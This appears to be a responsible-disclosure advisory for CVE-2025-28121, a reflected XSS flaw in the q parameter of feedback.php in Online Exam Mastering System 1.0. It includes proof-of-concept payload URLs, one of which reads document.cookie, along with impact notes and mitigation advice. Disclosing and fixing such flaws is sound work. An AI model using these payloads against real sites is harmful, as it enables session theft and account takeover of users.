# 💥 CVE-2025-28121 - Reflected XSS in Online Exam Mastering System 1.0

## 📝 Description

**code-projects Online Exam Mastering System 1.0** is vulnerable to **Reflected Cross-Site Scripting (XSS)** in the `feedback.php` file via the `q` parameter.

This issue allows remote attackers to inject malicious JavaScript into the application, which gets reflected in the response without proper sanitization or encoding. Successful exploitation can lead to cookie theft, account takeover, or other client-side attacks.

---

## 🕵️‍♂️ Vulnerability Details

| Field | Info |
|-------|------|
| **CVE ID** | CVE-2025-28121 |
| **Vulnerability Type** | Cross-Site Scripting (XSS) |
| **Affected Component** | `feedback.php` |
| **Attack Type** | Remote |
| **Impact** | Account Takeover, Privilege Escalation |
| **Product** | Online Exam Mastering System |
| **Version** | 1.0 |
| **Vendor** | code-projects |
| **Discoverer** | Pruthu Raut |

---

## 🔥 Proof of Concept (PoC)

### Vulnerable Endpoint

```
http://localhost/exam/feedback.php?q=Thank%20you%20for%20your%20valuable%20feedback
```

### Exploit Payload

```http
http://localhost/exam/feedback.php?q=<script>alert('XSS')</script>
http://localhost/exam/feedback.php?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E
```

> 💡 **Note:** Replace `localhost` with the deployed target IP or domain if testing on a live environment.

### How it Works

When the above URL is opened by a victim, the malicious script embedded in the `q` parameter gets executed in the context of the victim’s browser. Since the input is directly reflected without sanitization, it opens the door for classic reflected XSS attacks.

---

## ⚠️ Impact

- **Account Takeover** via session cookie theft.
- **Privilege Escalation** if an admin user clicks the link.
- **Browser Exploitation**, phishing, or other social engineering attacks.

---

## 🛡️ Mitigation

To prevent this vulnerability:
- Sanitize and encode user input before rendering.
- Use security libraries such as OWASP’s [ESAPI](https://owasp.org/www-project-enterprise-security-api/) or built-in PHP functions like `htmlspecialchars()`.
- Implement a Content Security Policy (CSP) to reduce the impact of injected scripts.

---

## 📣 Disclosure

This vulnerability was discovered and responsibly disclosed by **Pruthu Raut**.

---
## Video POC



https://github.com/user-attachments/assets/6af000c3-08ad-46a6-bc93-efc48218591d

